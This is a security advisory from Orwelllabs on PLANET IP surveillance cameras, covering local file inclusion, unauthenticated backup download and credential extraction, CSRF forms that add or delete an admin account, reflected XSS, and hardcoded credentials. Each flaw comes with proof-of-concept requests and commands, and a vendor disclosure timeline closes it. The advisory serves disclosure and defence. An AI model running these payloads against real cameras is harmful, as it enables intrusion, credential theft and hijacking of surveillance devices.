扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 |
_ _ _ _ | | | | | | ____ _________| | | | __ _| |_____ / _ \| '__\ \ /\ / / _ \ | | |/ _` | '_ \/ __| | (_) | | \ VV /__/ | | | (_| | |_) \__ \ \___/|_|\_/\_/ \___|_|_|_|\__,_|_.__/|___/ Security Adivisory 2016-04-06 www.orwelllabs.com Twitter:@orwelllabs mantra: ...not affect a product that is in scope for... AhHum! Overview ======== Technical Risk: high Likelihood of Exploitation: medium Credits: Discovered and researched by Orwelllabs CVE-Number: N/A DWF: Submited Adivisory URL: http://www.orwelllabs.com/2016/02/planet-ip-surveillance-camera-local.html [1] Issues ===== I. Local File Inclusion (42 vectors) II.Arbitrary file read/Authentication bypass III. Sensitive information disclosure IV.Cross-site request forgery V. Reflected Cross-site scripting VI.hardcoded credentials I. Local File Inclusion ======================= * CLASS: External Control of File Name or Path [CWE-73] The Web Management interface of PLANET IP surveillance Cams models FW-ICA-2500, ICA-2250VT, ICA-4200V, ICA-4500V, ICA-3350V, ICA-5350V AND ICA-8350 and probably others is prone to Local File Include (LFI). PoC --- The request bellow is generated when a new user is added, in this case we are adding the following administrative credential for the cam: "root:r00tx". GET /cgi-bin/admin/querylogin.cgi HTTP/1.1 Host: {xxx.xxx.xxx.xxx} User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http:// {xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=asp%2Fuser.asp Cookie: ipcam_profile=1; tour_index=-1; IsHideStreamingStatus=yes Authorization: Basic YdRRtXW41YXRtad4= Connection: keep-alive If-Modified-Since: Mon, 08 Jul 2013 11:10:26 GMT If the value of the parameter "redirect" was changed to any system file will return the contents of that file, as shown below: http:// {xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=/etc/passwd In this case will retrieved the content of /etc/passwd Vectors: ------- There are a total of 42 vectors of LFI, the detailed results will be published in www.orwelllabs.com [1] soon. Basically all menus of the camera (shown below) to submit, add, modify and remove settings trigger the corresponding scripts to access resource that contains a parameter "redirect" which is also affected. [ ----------------------------] [ #1:Network ---------------] -> 9 [ #2:Camera---------------] -> 3 [ #3:System-------------- ] -> 2 [ #4:Video -------------- ] -> 4 [ #5:Audio -------------- ] -> 1 [ #6:User-------------- ] -> 1 [ #7:Protocol ------------- ] -> 2 [ #8:E-Mail-------------- ] -> 1 [ #9:Event Detection ------ ] -> 1 [ #10: Storage -------------- ] -> 2 [ #11: Continuous Recording - ] -> 1 [ #12: Recording List ------- ] -> 0 [ #13: Event Server --------- ] -> 11 [ #14: Event Schedule ------- ] -> 4 [ ----------+---------------] II. Arbitrary file read/Authentication bypass ============================================= The camera offers a feature to perform the download settings via a backup file. However, (how acess control is not effective) this file remains accessible via the browser for an unauthenticated user. PoC --- wget --no-check-certificate https://{xxx.xxx.xxx.xxx}/backup.tar.gz tar -xzvf backup.tar.gz cat tmp/sysConfig/sysenv.cfg|strings|fmt|cut -f8,9 -d" " It will return the credential to access the camera Through this vulnerability a user can also obtain the credential of the AP to which the camera is connected just parsing the file: 'tmp/sysConfig/extra.info' III. Sensitive information disclosure ===================================== Using LFI vulnerability report, a user can obtain sensitive information such as username and password by reading the log file, as follows: {xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=&pwd=&grp=&sgrp=&action=&redirect=/var/log/messages IV. Cross-site request forgery ============================== Planet IP cams ICA-* are prone to Multple CSRF. PoC ------ - This will create a admin credential: root:r00tx <html> <!-- CSRF PoC - --> <body> <form action="http:// {xxx.xxx.xxx.xxx}/setup.cgi?language=ie&adduser=root:r00tx:1"> <input type="submit" value="Submit form" /> </form> </body> </html> - ICA-5350V <html> <!-- CSRF PoC --> <body> <form action="http:// {xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=add&redirect=asp%2Fuser.asp"> <input type="submit" value="Submit form" /> </form> </body> </html> - Del user root <html> <!-- CSRF PoC --> <body> <form action="http:// {xxx.xxx.xxx.xxx}/cgi-bin/admin/usrgrp.cgi?user=root&pwd=r00tx&grp=administrator&sgrp=ptz&action=remove&redirect=asp%2Fuser.asp"> <input type="submit" value="Submit form" /> </form> </body> </html> V. Cross-Site Scripting ======================= Cams models ICA-* are prone to Multiple XSS POC ------- http://{xxx.xxx.xxx.xxx}/setup.cgi?<script>alert("XSS")</script> this will pop-up the message XSS in the browser VI. hardcoded credentials ========================= The credentials of web management can be found just viewing the source of page default_nets.htm: POC ------ https://{xxx.xxx.xxx.xxx}/default_nets.htm code: } function av_onload(){ CheckMobileMode(); util_SetUserInfo(); Loadplay(); watchdog(); //alert("watchdog"); } function Loadplay(){ play("MasterUsr","MasterPwd","554",parseInt("99"),parseInt("99"),"1",parseInt("2"),parseInt("0"),"192.168.1.99",""); } Vulnerable Packages =================== ICA-2500 ICA-2250VT ICA-4200V ICA-4500V ICA-3350V ICA-5350V ICA-8350 Timeline ======== 2015-10-02 - Issues discovered 2015-11-30 - Vendor contacted (advisore sent) 2015-12-16 - Vendor contacted (asking for feedback about reported issues) 2015-12-17 - Vendor response (asking for more time to check issues) 2015-12-21 - RD team replied: can't duplicate vulnerabilities.... 2016-01-13 - Vendor contacted (submitted evidence that the vulnerabilities persist and can be reproduced.) ...and no news after that... |
体验盒子
